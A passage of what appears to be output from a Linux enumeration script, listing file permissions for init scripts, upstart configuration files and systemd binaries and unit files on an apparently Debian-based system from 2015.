-rwxr-xr-x   1 root root  9290 Apr  6  2015 checkroot.sh
-rwxr-xr-x   1 root root  1379 Dec  9  2011 console-setup
-rwxr-xr-x   1 root root  3049 Oct 24  2014 cron
-rwxr-xr-x   1 root root  2816 May 31  2015 cups
-rwxr-xr-x   1 root root  1961 Jul  3  2015 cups-browsed
-rwxr-xr-x   1 root root  2813 May 14  2015 dbus
-rwxr-xr-x   1 root root  6606 Feb 18  2015 exim4
-rwxr-xr-x   1 root root  6383 Mar 19  2014 fail2ban
-rwxr-xr-x   1 root root  1336 Apr  6  2015 halt
-rwxr-xr-x   1 root root  1423 Apr  6  2015 hostname.sh
-rwxr-xr-x   1 root root  3916 Mar 30  2015 hwclock.sh
-rwxr-xr-x   1 root root  8189 Oct 26  2014 kbd
-rwxr-xr-x   1 root root  1591 Oct  1  2012 keyboard-setup
-rwxr-xr-x   1 root root  1300 Apr  6  2015 killprocs
-rwxr-xr-x   1 root root  1990 Sep 23  2014 kmod
-rwxr-xr-x   1 root root   995 Apr  6  2015 motd
-rwxr-xr-x   1 root root   677 Apr  6  2015 mountall-bootclean.sh
-rwxr-xr-x   1 root root  2138 Apr  6  2015 mountall.sh
-rwxr-xr-x   1 root root  1461 Apr  6  2015 mountdevsubfs.sh
-rwxr-xr-x   1 root root  1564 Apr  6  2015 mountkernfs.sh
-rwxr-xr-x   1 root root   685 Apr  6  2015 mountnfs-bootclean.sh
-rwxr-xr-x   1 root root  2456 Apr  6  2015 mountnfs.sh
-rwxr-xr-x   1 root root  5485 Jul 15  2015 mysql
-rwxr-xr-x   1 root root  4760 Dec 14  2014 networking
-rwxr-xr-x   1 root root  5658 Aug 13  2014 nfs-common
-rwxr-xr-x   1 root root  1192 Mar  7  2015 procps
-rwxr-xr-x   1 root root  6228 Apr  6  2015 rc
-rwxr-xr-x   1 root root   820 Apr  6  2015 rc.local
-rwxr-xr-x   1 root root   117 Apr  6  2015 rcS
-rwxr-xr-x   1 root root   661 Apr  6  2015 reboot
-rwxr-xr-x   1 root root  1042 Apr  6  2015 rmnologin
-rwxr-xr-x   1 root root  2512 Jul 16  2014 rpcbind
-rwxr-xr-x   1 root root  2796 Oct  2  2014 rsyslog
-rwxr-xr-x   1 root root  2526 Oct 13  2014 saned
-rwxr-xr-x   1 root root  3207 Apr  6  2015 sendsigs
-rwxr-xr-x   1 root root   597 Apr  6  2015 single
-rw-r--r--   1 root root  1087 Apr  6  2015 skeleton
-rwxr-xr-x   1 root root  4077 Mar 23  2015 ssh
-rwxr-xr-x   1 root root   731 Mar 12  2015 sudo
-rwxr-xr-x   1 root root  6581 May 26  2015 udev
-rwxr-xr-x   1 root root   461 May 26  2015 udev-finish
-rwxr-xr-x   1 root root  2737 Apr  6  2015 umountfs
-rwxr-xr-x   1 root root  2202 Apr  6  2015 umountnfs.sh
-rwxr-xr-x   1 root root  1129 Apr  6  2015 umountroot
-rwxr-xr-x   1 root root  3111 Apr  6  2015 urandom
-rwxr-xr-x   1 root root  2666 Sep 26  2013 x11-common


[-] /etc/init/ config file permissions:
total 68
drwxr-xr-x   2 root root 4096 Aug  1  2015 .
drwxr-xr-x 105 root root 4096 Nov 17 08:35 ..
-rw-r--r--   1 root root  530 Jun  3  2014 network-interface-container.conf
-rw-r--r--   1 root root 1756 May  4  2013 network-interface-security.conf
-rw-r--r--   1 root root  933 Jun  3  2014 network-interface.conf
-rw-r--r--   1 root root 2493 Jun  3  2014 networking.conf
-rw-r--r--   1 root root  815 Aug 11  2013 portmap-wait.conf
-rw-r--r--   1 root root  209 Aug 11  2013 rpcbind-boot.conf
-rw-r--r--   1 root root 1042 Aug 15  2013 rpcbind.conf
-rw-r--r--   1 root root  641 Mar 23  2015 ssh.conf
-rw-r--r--   1 root root  581 Apr 10  2014 startpar-bridge.conf
-rw-r--r--   1 root root  637 May 26  2015 udev-fallback-graphics.conf
-rw-r--r--   1 root root  643 May 26  2015 udev-finish.conf
-rw-r--r--   1 root root  337 May 26  2015 udev.conf
-rw-r--r--   1 root root  356 May 26  2015 udevmonitor.conf
-rw-r--r--   1 root root  352 May 26  2015 udevtrigger.conf
-rw-r--r--   1 root root  141 Aug 12  2014 usb-modeswitch-upstart.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 6.6M
drwxr-xr-x 19 root root  36K Aug  2  2015 system
drwxr-xr-x  2 root root 4.0K Aug  1  2015 network
drwxr-xr-x  2 root root 4.0K Aug  1  2015 system-generators
drwxr-xr-x  2 root root 4.0K Aug  1  2015 system-preset
-rwxr-xr-x  1 root root 294K May 27  2015 systemd-udevd
-rwxr-xr-x  1 root root 9.4K May 27  2015 systemd-ac-power
-rwxr-xr-x  1 root root  42K May 27  2015 systemd-modules-load
-rwxr-xr-x  1 root root  34K May 27  2015 systemd-remount-fs
-rwxr-xr-x  1 root root  26K May 27  2015 systemd-reply-password
-rwxr-xr-x  1 root root  38K May 27  2015 systemd-sysctl
-rwxr-xr-x  1 root root 310K May 27  2015 systemd-timedated
-rwxr-xr-x  1 root root 242K May 27  2015 systemd-update-utmp
-rwxr-xr-x  1 root root  46K May 27  2015 systemd-activate
-rwxr-xr-x  1 root root  34K May 27  2015 systemd-binfmt
-rwxr-xr-x  1 root root 298K May 27  2015 systemd-bus-proxyd
-rwxr-xr-x  1 root root  66K May 27  2015 systemd-cryptsetup
-rwxr-xr-x  1 root root 242K May 27  2015 systemd-initctl
-rwxr-xr-x  1 root root 258K May 27  2015 systemd-journald
-rwxr-xr-x  1 root root 306K May 27  2015 systemd-localed
-rwxr-xr-x  1 root root 526K May 27  2015 systemd-logind
-rwxr-xr-x  1 root root 330K May 27  2015 systemd-machined
-rwxr-xr-x  1 root root  74K May 27  2015 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  30K May 27  2015 systemd-quotacheck
-rwxr-xr-x  1 root root  26K May 27  2015 systemd-random-seed
-rwxr-xr-x  1 root root  74K May 27  2015 systemd-readahead
-rwxr-xr-x  1 root root  42K May 27  2015 systemd-rfkill
-rwxr-xr-x  1 root root 106K May 27  2015 systemd-timesyncd
-rwxr-xr-x  1 root root  22K May 27  2015 systemd-user-sessions
-rwxr-xr-x  1 root root 1.3M May 27  2015 systemd
-rwxr-xr-x  1 root root  54K May 27  2015 systemd-backlight
-rwxr-xr-x  1 root root  82K May 27  2015 systemd-bootchart
-rwxr-xr-x  1 root root 238K May 27  2015 systemd-cgroups-agent
-rwxr-xr-x  1 root root 262K May 27  2015 systemd-fsck
-rwxr-xr-x  1 root root 298K May 27  2015 systemd-hostnamed
-rwxr-xr-x  1 root root 546K May 27  2015 systemd-networkd
-rwxr-xr-x  1 root root  78K May 27  2015 systemd-resolved
-rwxr-xr-x  1 root root  38K May 27  2015 systemd-shutdownd
-rwxr-xr-x  1 root root  50K May 27  2015 systemd-sleep
-rwxr-xr-x  1 root root  14K May 27  2015 systemd-multi-seat-x
-rwxr-xr-x  1 root root  90K May 27  2015 systemd-shutdown
-rwxr-xr-x  1 root root  78K May 27  2015 systemd-socket-proxyd
-rwxr-xr-x  1 root root  546 May 27  2015 debian-fixup
-rwxr-xr-x  1 root root  462 May 27  2015 systemd-logind-launch
drwxr-xr-x  2 root root 4.0K May 27  2015 system-shutdown
drwxr-xr-x  2 root root 4.0K May 27  2015 system-sleep

/lib/systemd/system:
total 716K
drwxr-xr-x 2 root root 4.0K Aug  1  2015 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 getty.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 runlevel5.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 timers.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Aug  1  2015 networking.service.d
-rw-r--r-- 1 root root  121 Jun  9  2015 cups.path
-rw-r--r-- 1 root root  225 Jun  9  2015 cups.service
-rw-r--r-- 1 root root  175 Jun  9  2015 cups.socket
-rw-r--r-- 1 root root  366 May 28  2015 dbus.service
-rw-r--r-- 1 root root  106 May 28  2015 dbus.socket
lrwxrwxrwx 1 root root   14 May 27  2015 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 May 27  2015 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 May 27  2015 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 May 27  2015 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 May 27  2015 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 May 27  2015 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 May 27  2015 dbus-org.freedesktop.machine1.service -> systemd-machined.service
lrwxrwxrwx 1 root root   25 May 27  2015 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 May 27  2015 default.target -> graphical.target
lrwxrwxrwx 1 root root    9 May 27  2015 fuse.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 hwclockfirst.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 May 27  2015 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root   28 May 27  2015 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 May 27  2015 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 May 27  2015 procps.service -> systemd-sysctl.service
lrwxrwxrwx 1 root root   16 May 27  2015 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 May 27  2015 reboot.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 May 27  2015 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 May 27  2015 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 May 27  2015 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 May 27  2015 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 May 27  2015 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 May 27  2015 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 May 27  2015 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 May 27  2015 sendsigs.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root   21 May 27  2015 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 May 27  2015 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 27  2015 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 May 27  2015 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root    9 May 27  2015 x11-common.service -> /dev/null
-rw-r--r-- 1 root root  402 May 27  2015 debian-fixup.service
-rw-r--r-- 1 root root  342 May 27  2015 getty-static.service
-rw-r--r-- 1 root root  398 May 27  2015 hwclock-save.service
-rw-r--r-- 1 root root  315 May 27  2015 ifup@.service
-rw-r--r-- 1 root root  271 May 27  2015 systemd-setup-dgram-qlen.service
-rw-r--r-- 1 root root  217 May 27  2015 udev-finish.service
-rw-r--r-- 1 root root  737 May 27  2015 console-getty.service
-rw-r--r-- 1 root root  741 May 27  2015 console-shell.service
-rw-r--r-- 1 root root  783 May 27  2015 container-getty@.service
-rw-r--r-- 1 root root 1010 May 27  2015 debug-shell.service
-rw-r--r-- 1 root root  986 May 27  2015 emergency.service
-rw-r--r-- 1 root root 1.5K May 27  2015 getty@.service
-rw-r--r-- 1 root root  565 May 27  2015 halt-local.service
-rw-r--r-- 1 root root  630 May 27  2015 initrd-cleanup.service
-rw-r--r-- 1 root root  790 May 27  2015 initrd-parse-etc.service
-rw-r--r-- 1 root root  640 May 27  2015 initrd-switch-root.service
-rw-r--r-- 1 root root  664 May 27  2015 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  675 May 27  2015 kmod-static-nodes.service
-rw-r--r-- 1 root root  473 May 27  2015 mail-transport-agent.target
-rw-r--r-- 1 root root  635 May 27  2015 quotaon.service
-rw-r--r-- 1 root root  633 May 27  2015 rc-local.service
-rw-r--r-- 1 root root  954 May 27  2015 rescue.service
-rw-r--r-- 1 root root 1.1K May 27  2015 serial-getty@.service
-rw-r--r-- 1 root root  653 May 27  2015 systemd-ask-password-console.service
-rw-r--r-- 1 root root  681 May 27  2015 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  776 May 27  2015 systemd-backlight@.service
-rw-r--r-- 1 root root 1011 May 27  2015 systemd-binfmt.service
-rw-r--r-- 1 root root  725 May 27  2015 systemd-fsck-root.service
-rw-r--r-- 1 root root  678 May 27  2015 systemd-fsck@.service
-rw-r--r-- 1 root root  544 May 27  2015 systemd-halt.service
-rw-r--r-- 1 root root  501 May 27  2015 systemd-hibernate.service
-rw-r--r-- 1 root root  710 May 27  2015 systemd-hostnamed.service
-rw-r--r-- 1 root root  519 May 27  2015 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  480 May 27  2015 systemd-initctl.service
-rw-r--r-- 1 root root  698 May 27  2015 systemd-journal-flush.service
-rw-r--r-- 1 root root 1.1K May 27  2015 systemd-journald.service
-rw-r--r-- 1 root root  557 May 27  2015 systemd-kexec.service
-rw-r--r-- 1 root root  691 May 27  2015 systemd-localed.service
-rw-r--r-- 1 root root 1.2K May 27  2015 systemd-logind.service
-rw-r--r-- 1 root root  795 May 27  2015 systemd-machined.service
-rw-r--r-- 1 root root 1.1K May 27  2015 systemd-modules-load.service
-rw-r--r-- 1 root root  685 May 27  2015 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root  936 May 27  2015 systemd-networkd.service
-rw-r--r-- 1 root root  605 May 27  2015 systemd-nspawn@.service
-rw-r--r-- 1 root root  553 May 27  2015 systemd-poweroff.service
-rw-r--r-- 1 root root  681 May 27  2015 systemd-quotacheck.service
-rw-r--r-- 1 root root  769 May 27  2015 systemd-random-seed.service
-rw-r--r-- 1 root root  841 May 27  2015 systemd-readahead-collect.service
-rw-r--r-- 1 root root  638 May 27  2015 systemd-readahead-done.service
-rw-r--r-- 1 root root  753 May 27  2015 systemd-readahead-replay.service
-rw-r--r-- 1 root root  548 May 27  2015 systemd-reboot.service
-rw-r--r-- 1 root root  824 May 27  2015 systemd-remount-fs.service
-rw-r--r-- 1 root root  686 May 27  2015 systemd-resolved.service
-rw-r--r-- 1 root root  758 May 27  2015 systemd-rfkill@.service
-rw-r--r-- 1 root root  475 May 27  2015 systemd-shutdownd.service
-rw-r--r-- 1 root root  497 May 27  2015 systemd-suspend.service
-rw-r--r-- 1 root root  707 May 27  2015 systemd-sysctl.service
-rw-r--r-- 1 root root  655 May 27  2015 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K May 27  2015 systemd-timesyncd.service
-rw-r--r-- 1 root root  665 May 27  2015 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  770 May 27  2015 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  750 May 27  2015 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  823 May 27  2015 systemd-udev-settle.service
-rw-r--r-- 1 root root  715 May 27  2015 systemd-udev-trigger.service
-rw-r--r-- 1 root root  826 May 27  2015 systemd-udevd.service
-rw-r--r-- 1 root root  757 May 27  2015 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  821 May 27  2015 systemd-update-utmp.service
-rw-r--r-- 1 root root  550 May 27  2015 systemd-user-sessions.service
-rw-r--r-- 1 root root  497 May 27  2015 user@.service
-rw-r--r-- 1 root root  403 May 27  2015 -.slice
-rw-r--r-- 1 root root  524 May 27  2015 basic.target
-rw-r--r-- 1 root root  379 May 27  2015 bluetooth.target
-rw-r--r-- 1 root root  394 May 27  2015 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 May 27  2015 cryptsetup.target
-rw-r--r-- 1 root root  636 May 27  2015 dev-hugepages.mount
-rw-r--r-- 1 root root  590 May 27  2015 dev-mqueue.mount
-rw-r--r-- 1 root root  431 May 27  2015 emergency.target
-rw-r--r-- 1 root root  440 May 27  2015 final.target
-rw-r--r-- 1 root root  460 May 27  2015 getty.target
-rw-r--r-- 1 root root  490 May 27  2015 graphical.target
-rw-r--r-- 1 root root  487 May 27  2015 halt.target
-rw-r--r-- 1 root root  447 May 27  2015 hibernate.target
-rw-r--r-- 1 root root  468 May 27  2015 hybrid-sleep.target
-rw-r--r-- 1 root root  553 May 27  2015 initrd-fs.target
-rw-r--r-- 1 root root  526 May 27  2015 initrd-root-fs.target
-rw-r--r-- 1 root root  691 May 27  2015 initrd-switch-root.target
-rw-r--r-- 1 root root  671 May 27  2015 initrd.target
-rw-r--r-- 1 root root  501 May 27  2015 kexec.target
-rw-r--r-- 1 root root  395 May 27  2015 local-fs-pre.target
-rw-r--r-- 1 root root  507 May 27  2015 local-fs.target
-rw-r--r-- 1 root root  405 May 27  2015 machine.slice
-rw-r--r-- 1 root root  492 May 27  2015 multi-user.target
-rw-r--r-- 1 root root  464 May 27  2015 network-online.target
-rw-r--r-- 1 root root  461 May 27  2015 network-pre.target
-rw-r--r-- 1 root root  480 May 27  2015 network.target
-rw-r--r-- 1 root root  514 May 27  2015 nss-lookup.target
-rw-r--r-- 1 root root  473 May 27  2015 nss-user-lookup.target
-rw-r--r-- 1 root root  354 May 27  2015 paths.target
-rw-r--r-- 1 root root  500 May 27  2015 poweroff.target
-rw-r--r-- 1 root root  377 May 27  2015 printer.target
-rw-r--r-- 1 root root  693 May 27  2015 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 May 27  2015 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  493 May 27  2015 reboot.target
-rw-r--r-- 1 root root  396 May 27  2015 remote-fs-pre.target
-rw-r--r-- 1 root root  498 May 27  2015 remote-fs.target
-rw-r--r-- 1 root root  486 May 27  2015 rescue.target
-rw-r--r-- 1 root root  500 May 27  2015 rpcbind.target
-rw-r--r-- 1 root root  402 May 27  2015 shutdown.target
-rw-r--r-- 1 root root  362 May 27  2015 sigpwr.target
-rw-r--r-- 1 root root  420 May 27  2015 sleep.target
-rw-r--r-- 1 root root  409 May 27  2015 slices.target
-rw-r--r-- 1 root root  380 May 27  2015 smartcard.target
-rw-r--r-- 1 root root  356 May 27  2015 sockets.target
-rw-r--r-- 1 root root  380 May 27  2015 sound.target
-rw-r--r-- 1 root root  441 May 27  2015 suspend.target
-rw-r--r-- 1 root root  353 May 27  2015 swap.target
-rw-r--r-- 1 root root  681 May 27  2015 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  719 May 27  2015 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 May 27  2015 sys-kernel-debug.mount
-rw-r--r-- 1 root root  518 May 27  2015 sysinit.target
-rw-r--r-- 1 root root 1.3K May 27  2015 syslog.socket
-rw-r--r-- 1 root root  652 May 27  2015 system-update.target
-rw-r--r-- 1 root root  433 May 27  2015 system.slice
-rw-r--r-- 1 root root  646 May 27  2015 systemd-ask-password-console.path
-rw-r--r-- 1 root root  574 May 27  2015 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  524 May 27  2015 systemd-initctl.socket
-rw-r--r-- 1 root root 1.1K May 27  2015 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root  842 May 27  2015 systemd-journald.socket
-rw-r--r-- 1 root root  635 May 27  2015 systemd-readahead-done.timer
-rw-r--r-- 1 root root  555 May 27  2015 systemd-readahead-drop.service
-rw-r--r-- 1 root root  528 May 27  2015 systemd-shutdownd.socket
-rw-r--r-- 1 root root  450 May 27  2015 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  578 May 27  2015 systemd-udevd-control.socket
-rw-r--r-- 1 root root  575 May 27  2015 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  395 May 27  2015 time-sync.target
-rw-r--r-- 1 root root  355 May 27  2015 timers.target
-rw-r--r-- 1 root root  661 May 27  2015 tmp.mount
-rw-r--r-- 1 root root  417 May 27  2015 umount.target
-rw-r--r-- 1 root root  392 May 27  2015 user.slice
-rw-r--r-- 1 root root 1.1K Apr 14  2015 avahi-daemon.service
-rw-r--r-- 1 root root  874 Apr 14  2015 avahi-daemon.socket
-rw-r--r-- 1 root root  344 Mar 23  2015 ssh.service
-rw-r--r-- 1 root root  216 Mar 23  2015 ssh.socket
-rw-r--r-- 1 root root  196 Mar 23  2015 ssh@.service
-rw-r--r-- 1 root root  272 Mar 12  2015 sudo.service
-rw-r--r-- 1 root root  323 Dec 26  2014 saned@.service
-rw-r--r-- 1 root root  132 Dec 12  2014 saned.socket
-rw-r--r-- 1 root root  298 Dec 10  2014 colord.service
-rw-r--r-- 1 root root  182 Nov 28  2014 polkitd.service
-rw-r--r-- 1 root root  115 Nov  9  2014 acpid.path
-rw-r--r-- 1 root root  199 Nov  9  2014 acpid.service
-rw-r--r-- 1 root root  115 Nov  9  2014 acpid.socket
-rw-r--r-- 1 root root  234 Oct 26  2014 cron.service
-rw-r--r-- 1 root root  290 Oct  2  2014 rsyslog.service
-rw-r--r-- 1 root root  169 Sep 30  2014 atd.service
-rw-r--r-- 1 root root  150 Aug 12  2014 usb_modeswitch@.service
-rw-r--r-- 1 root root  225 Dec 11  2013 cups-browsed.service

/lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 May 28  2015 dbus.socket -> ../dbus.socket

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 May 28  2015 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 15 May 27  2015 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 May 27  2015 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 May 27  2015 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 May 27  2015 systemd-user-sessions.service -> ../systemd-user-sessions.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 May 28  2015 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 25 May 27  2015 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 34 May 27  2015 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 May 27  2015 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 27 May 27  2015 systemd-shutdownd.socket -> ../systemd-shutdownd.socket
lrwxrwxrwx 1 root root 31 May 27  2015 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 May 27  2015 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 May 27  2015 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 May 27  2015 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel4.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel5.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 May 27  2015 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 23 May 27  2015 debian-fixup.service -> ../debian-fixup.service
lrwxrwxrwx 1 root root 22 May 27  2015 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 May 27  2015 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 May 27  2015 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 May 27  2015 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 May 27  2015 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 May 27  2015 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 May 27  2015 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 May 27  2015 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 May 27  2015 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 32 May 27  2015 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 May 27  2015 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 31 May 27  2015 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 May 27  2015 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 May 27  2015 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 May 27  2015 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 May 27  2015 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 May 27  2015 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 May 27  2015 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 May 27  2015 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 22 May 27  2015 udev-finish.service -> ../udev-finish.service

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 May 27  2015 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel1.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel2.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/runlevel3.target.wants:
total 0
lrwxrwxrwx 1 root root 39 May 27  2015 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/networking.service.d:
total 4.0K
-rw-r--r-- 1 root root 32 May 27  2015 network-pre.conf

